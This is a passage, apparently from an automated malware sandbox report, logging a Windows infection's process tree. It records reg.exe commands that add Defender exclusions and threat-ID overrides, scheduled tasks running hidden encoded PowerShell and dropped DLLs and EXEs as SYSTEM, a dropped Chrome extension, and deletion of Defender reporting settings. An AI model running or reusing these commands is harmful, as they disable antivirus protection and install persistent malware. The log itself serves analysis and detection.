- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6016
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YyYjRnRkbVRlC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YyYjRnRkbVRlC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uXFrNnbxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uXFrNnbxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xzDgZbVAMpcU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xzDgZbVAMpcU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoUVQYphcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoUVQYphcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uoeTMjmBwbxJSYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uoeTMjmBwbxJSYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:6052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5268
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uXFrNnbxU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uXFrNnbxU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xzDgZbVAMpcU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xzDgZbVAMpcU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoUVQYphcUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoUVQYphcUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uoeTMjmBwbxJSYVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uoeTMjmBwbxJSYVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTUWAcRmBxLxQDsb /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTUWAcRmBxLxQDsb /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gjJfiMTeT" /SC once /ST 00:43:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5792
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gjJfiMTeT"
  2⤵
  PID:5896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gjJfiMTeT"
  2⤵
  PID:5448
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrfLLMZdwqFuiRyRk" /SC once /ST 01:21:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\AYujpiU.exe\" yF /site_id 690689 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrfLLMZdwqFuiRyRk"
  2⤵
  PID:5536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5924
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:212

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5548

C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\AYujpiU.exe
C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\AYujpiU.exe yF /site_id 690689 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5560
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bPLWYbEmiNLoeLgDZO"
  2⤵
  PID:5708
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:5752
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:5776
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:6108
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:2152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\uXFrNnbxU\HuZRJe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IHfUYafURfJPxJE" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5248
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "IHfUYafURfJPxJE2" /F /xml "C:\Program Files (x86)\uXFrNnbxU\aDeAMwg.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6140
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IHfUYafURfJPxJE"
  2⤵
  PID:2872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IHfUYafURfJPxJE"
  2⤵
  PID:3484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xMVZbUzooATnpr" /F /xml "C:\Program Files (x86)\xzDgZbVAMpcU2\xjczrfO.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hPaTWMKhISzaX2" /F /xml "C:\ProgramData\uoeTMjmBwbxJSYVB\pKYtERI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:756
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pRgklVFfAhfqdzzLk2" /F /xml "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\UhFiQGt.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "uOaHhhRVoELLoDMhYqk2" /F /xml "C:\Program Files (x86)\YyYjRnRkbVRlC\miEqRqI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sZfSYDKOGgdsigSHj" /SC once /ST 00:25:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\aFydbUEw\aDiHLWY.dll\",#1 /site_id 690689" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "sZfSYDKOGgdsigSHj"
  2⤵
  PID:3952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HZwnO1" /SC once /ST 01:01:39 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
  2⤵
  - Creates scheduled task(s)
  PID:5840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "HZwnO1"
  2⤵
  PID:5876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "HZwnO1"
  2⤵
  PID:5332
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:5384
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:5124
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:5512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "rrfLLMZdwqFuiRyRk"
  2⤵
  PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3160 -ip 3160
1⤵
PID:4984

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTUWAcRmBxLxQDsb\aFydbUEw\aDiHLWY.dll",#1 /site_id 690689
1⤵
PID:1892
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTUWAcRmBxLxQDsb\aFydbUEw\aDiHLWY.dll",#1 /site_id 690689
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:4760
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "sZfSYDKOGgdsigSHj"
    3⤵
    PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3160 -ip 3160
1⤵
PID:5464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3160 -ip 3160
1⤵
PID:5828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc94d09758,0x7ffc94d09768,0x7ffc94d09778
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:2
  2⤵
  PID:5500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:5988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:4964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3612 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4636 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4820 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:3484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5172 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:2040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5792 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5956 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4916 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5116 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5492 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files\Google\Chrome\Application\chrome.exe
